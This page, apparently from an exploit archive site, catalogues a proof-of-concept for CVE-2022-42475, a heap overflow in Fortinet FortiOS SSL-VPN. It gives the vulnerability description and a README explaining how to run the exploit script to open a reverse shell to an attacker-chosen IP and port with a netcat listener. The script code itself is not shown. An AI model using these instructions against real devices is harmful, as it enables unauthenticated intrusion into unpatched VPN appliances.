Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-42475 PoC — Fortinet FortiOS 缓冲区错误漏洞

Source
Associated Vulnerability
Title:Fortinet FortiOS 缓冲区错误漏洞 (CVE-2022-42475)
Description:A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and FortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests.
Readme
# cve-2022-42475
POC code to exploit the Heap overflow in Fortinet's SSLVPN daemon

## Usage
**pip install pwntools**
To use this code, you can save it in a file, say exploit.py, and then run it with Python in the command line, passing in the required arguments. Here's an example command to run the exploit
> python exploit.py <target_host> <target_port> <reverse_ip> <command1> <command2> 

Replace <target_host> with the hostname or IP address of the target system, <target_port> with the port number of the vulnerable service, and <reverse_ip> with the IP address of the machine you want to receive a shell on. The remaining arguments are the commands that you want to execute, separated by spaces.

For example, if the target system has IP address 192.168.0.100, the vulnerable service is running on port 8080, and you want to execute the ls and id commands, you would run the following command:

> python exploit.py 192.168.0.100 8080 192.168.0.101 id

This will create a reverse shell connection to 192.168.0.101:31337 and execute the ls and id commands on the target system. Note that you will need to have a listener running on the specified IP address and port to receive the reverse shell. You can use tools like ncat or netcat to create a listener.
File Snapshot

[4.0K] /data/pocs/35ee2bde001e2ddd2590cb19feee3d87320d1546 ├── [1.7K] cve-2022-42475.py └── [1.2K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →